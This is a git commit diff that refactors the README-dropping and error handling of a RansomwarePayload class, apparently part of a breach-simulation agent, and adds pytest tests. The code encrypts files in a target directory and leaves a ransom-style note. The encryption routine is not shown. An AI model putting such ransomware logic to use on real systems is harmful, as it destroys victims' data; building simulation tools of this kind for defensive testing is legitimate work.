Agent: Move exception handling from readme_dropper to ransomware_payload

This commit is contained in:
Mike Salvatore 2021-11-30 10:42:12 -05:00
parent f87802678b
commit 14c298e89c
3 changed files with 53 additions and 16 deletions

View File

@ -1,5 +1,4 @@
import logging import logging
import os
from pathlib import Path from pathlib import Path
from typing import Callable, List from typing import Callable, List
@ -27,6 +26,10 @@ class RansomwarePayload:
self._leave_readme = leave_readme self._leave_readme = leave_readme
self._telemetry_messenger = telemetry_messenger self._telemetry_messenger = telemetry_messenger
self._target_directory = self._config.target_directory
self._readme_file_path = (
self._target_directory / README_FILE_NAME if self._target_directory else None
)
self._readme_incomplete = False self._readme_incomplete = False
def run_payload(self): def run_payload(self):
@ -40,9 +43,7 @@ class RansomwarePayload:
self._encrypt_files(file_list) self._encrypt_files(file_list)
if self._config.readme_enabled: if self._config.readme_enabled:
self._readme_incomplete = True self._leave_readme_in_target_directory()
self._leave_readme(README_SRC, self._config.target_directory / README_FILE_NAME)
self._readme_incomplete = False
def _find_files(self) -> List[Path]: def _find_files(self) -> List[Path]:
logger.info(f"Collecting files in {self._config.target_directory}") logger.info(f"Collecting files in {self._config.target_directory}")
@ -64,6 +65,14 @@ class RansomwarePayload:
encryption_attempt = FileEncryptionTelem(str(filepath), success, error) encryption_attempt = FileEncryptionTelem(str(filepath), success, error)
self._telemetry_messenger.send_telemetry(encryption_attempt) self._telemetry_messenger.send_telemetry(encryption_attempt)
def _leave_readme_in_target_directory(self):
try:
self._readme_incomplete = True
self._leave_readme(README_SRC, self._readme_file_path)
self._readme_incomplete = False
except Exception as ex:
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
def cleanup(self): def cleanup(self):
if self._readme_incomplete: if self._readme_incomplete:
logger.info( logger.info(
@ -71,8 +80,8 @@ class RansomwarePayload:
"trying again." "trying again."
) )
try: try:
os.remove(self._config.target_directory / README_FILE_NAME) self._readme_file_path.unlink()
self._leave_readme(README_SRC, self._config.target_directory / README_FILE_NAME) self._leave_readme_in_target_directory()
except Exception as ex: except Exception as ex:
logger.info( logger.info(
f"An exception occurred: {str(ex)}. README.txt file dropping was " f"An exception occurred: {str(ex)}. README.txt file dropping was "

View File

@ -10,13 +10,5 @@ def leave_readme(src: Path, dest: Path):
logger.warning(f"{dest} already exists, not leaving a new README.txt") logger.warning(f"{dest} already exists, not leaving a new README.txt")
return return
_copy_readme_file(src, dest)
def _copy_readme_file(src: Path, dest: Path):
logger.info(f"Leaving a ransomware README file at {dest}") logger.info(f"Leaving a ransomware README file at {dest}")
try:
shutil.copyfile(src, dest) shutil.copyfile(src, dest)
except Exception as ex:
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")

View File

@ -1,4 +1,4 @@
from pathlib import PurePosixPath from pathlib import Path, PurePosixPath
from unittest.mock import MagicMock from unittest.mock import MagicMock
import pytest import pytest
@ -173,3 +173,39 @@ def test_no_readme_if_no_directory(
ransomware_payload.run_payload() ransomware_payload.run_payload()
mock_leave_readme.assert_not_called() mock_leave_readme.assert_not_called()
def test_leave_readme_exceptions_handled(build_ransomware_payload, ransomware_payload_config):
leave_readme = MagicMock(side_effect=Exception("Test exception when leaving README"))
ransomware_payload_config.readme_enabled = True
ransomware_payload = build_ransomware_payload(
config=ransomware_payload_config, leave_readme=leave_readme
)
# Test will fail if exception is raised and not handled
ransomware_payload.run_payload()
ransomware_payload.cleanup()
def test_cleanup_incomplete_readme(build_ransomware_payload, ransomware_payload_config):
def leave_readme(_: Path, dest: Path):
if leave_readme.i == 0:
dest.touch()
leave_readme.i += 1
raise Exception("Test exception when leaving README")
leave_readme.i = 0
ransomware_payload_config.readme_enabled = True
ransomware_payload = build_ransomware_payload(
config=ransomware_payload_config, leave_readme=leave_readme
)
ransomware_payload.run_payload()
assert (ransomware_payload_config.target_directory / README_FILE_NAME).exists()
ransomware_payload.cleanup()
assert not (ransomware_payload_config.target_directory / README_FILE_NAME).exists()
assert leave_readme.i == 2